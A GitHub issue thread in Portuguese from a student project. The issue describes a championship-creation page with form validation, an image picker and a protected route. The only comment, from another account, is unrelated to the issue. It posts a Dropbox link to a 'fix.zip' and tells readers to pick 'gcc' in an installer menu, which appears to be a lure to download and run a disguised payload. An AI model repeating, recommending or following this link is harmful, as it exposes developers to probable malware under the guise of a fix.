### ISSUE TITLE
feat: Criar página de criação de campeonatos

### ISSUE THREAD

**Issue by PedroALuciano** [unb-mds/Mds-SitePesadelo#77]
## Descrição da Tarefa

Implementar uma nova página de criação de campeonatos no sistema. Essa página deve permitir ao usuário adicionar informações detalhadas sobre um campeonato, incluindo nome, modalidade, data, localização, quantidade de participantes, horários, e imagem. O formulário também deve ser validado antes do envio e os dados devem ser enviados para a API para criar o novo campeonato.

## Critérios de Aceitação

- [x] Adicionada a prop type para diferenciar entre seleção de imagens quadradas e circulares.
- [x] Interface IImagePicker atualizada para incluir a prop opcional type.
styles.ts: Estilos atualizados para suportar contêineres de imagem com diferentes tipos de borda (circular ou quadrada).
- [x] Ajustes na estilização para melhorar a exibição dos inputs, incluindo padding e posição dos elementos.
- [x] Adicionado key no mapeamento de links para corrigir warnings de elementos duplicados no React.
- [x] Adicionada a rota protegida para a página de criação de campeonatos

## Informações Adicionais

Essa implementação visa proporcionar uma interface simples e funcional para a criação de novos campeonatos, garantindo que apenas usuários autorizados possam acessar e realizar essa operação.

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
